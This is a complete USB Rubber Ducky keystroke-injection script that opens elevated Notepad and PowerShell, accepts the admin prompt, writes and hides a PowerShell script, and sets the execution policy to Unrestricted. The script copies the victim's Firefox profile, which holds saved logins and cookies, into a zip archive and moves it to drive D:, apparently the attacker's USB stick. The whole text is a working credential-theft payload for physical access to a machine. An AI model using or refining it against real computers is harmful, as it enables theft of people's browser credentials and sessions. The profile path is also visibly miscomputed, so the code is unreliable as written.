DELAY 750
GUI r
DELAY 750
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 300
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
ENTER
STRING $fileSaveDir = New-Item  ($userDir) -ItemType Directory
ENTER
STRING $date = get-date
ENTER
STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
ENTER
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'
ENTER
STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"
ENTER
STRING  $fireSaveDir = New-Item $userDir'\Duck\FireFox-Profile' -ItemType Directory
ENTER
STRING $fireDir = $userDir + '\AppData\Roaming\Mozilla\Firefox\Profiles'
ENTER
STRING $getFire = Get-Item -Path $fireDir -Exclude extensions
ENTER
STRING Copy-Item $getFire $fireSaveDir -Recurse
ENTER
STRING Start-Sleep -s 10
ENTER
STRING $Report >> $fileSaveDir'/ComputerInfo.html'
ENTER
DELAY 300
STRING $saveFile = $userDir + '.zip'
ENTER
DELAY 100
STRING $toUSB = Compress-Archive -Path $userDir -DestinationPath $saveFile
DELAY 100
ENTER
DELAY 100
STRING $toUSB
DELAY 100
ENTER
STRING move-item $saveFile D:
CTRL S
DELAY  1600
STRING C:\Windows\ducky.ps1
ENTER
DELAY 1600
ALT F4
DELAY 1600
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 1600
ALT y
DELAY 1600
STRING mode con:cols=14 lines=1
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 1600
STRING powershell.exe -windowstyle hidden -File C:\Windows\ducky.ps1
ENTER